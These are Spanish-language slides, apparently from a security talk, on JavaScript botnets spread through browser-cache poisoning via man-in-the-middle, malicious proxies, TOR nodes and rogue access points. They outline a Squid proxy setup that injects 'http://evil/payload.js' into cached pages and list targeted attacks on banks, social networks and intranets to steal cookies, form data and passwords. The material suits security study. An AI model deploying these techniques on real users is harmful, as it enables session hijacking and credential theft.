En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.
6. Man in the Middle
• Interceptación de comunicaciones entre
clientes y servidores
• Canal comprometido … p0wned seguro
• Red:
– ARP Spoofing
– Rogue DHCP(6)
– ICMPv6 Sppofing, SLAAC
• DNS Spoofing
7. Man in the Browser
• Plugins para interceptar navegación
– BHO
– Addons
• Acceso a todo el navegador
– Passwords
– Código
• Troyanos Bancarios
– “Tengo un ruso en mi IE”
8. JavaScript in the Middle
• Envenenamiento de la caché del navegador
• No es permanente:
– Si se borra la caché, se elimina la infección
• Todo archivo cacheado se usa si no ha expirado
• Permiten introducir código javascript remoto
• Acceso a:
– Cookies
• Salvo HTTPOnly (more or less)
– Código HTML
– Campos introducidos en formularios
– URL
– Ejecución de código remoto
– …
10. ¿Cómo meterlo?
• XSS Permanentes
• Owneando HTTP Servers
• Ataques Man In the middle de red
• Ataques a memcache
• Imaginación….
11. - Framework para infectar la caché de navegadores
- Inyecta un javascript en cliente
- Ese javascript va incluyendo los mismos payloads
- http://beefproject.com
- Muy conocido
16. Monta un Proxy con SQUID
GET / HTTP/1.1 GET / HTTP/1.1
Host: www.web.com Host: www.web.com
Response Response
Home.html Home.html
GET /a.jsp HTTP/1.1 GET /a.jsp HTTP/1.1
Host: www.web.com Host: www.web.com
Response
Response
a.Jsp + pasarela.js
a.jsp
include http://evil/payload.js
GET /payload.js HTTP/1.1
Host: evil
17. Configura squid y haz que no expiren
Squid.conf: Activar URL rewrite program
.htaccess: Que no expiren los objetos de Apache
51. Ataque dirigido a sitios
• Selección objetivo
– Banco
– Red Social
– Intranet
• Analiza los js que carga
• Payload:
– Inclusión de payloads en cualquier página que
navegue.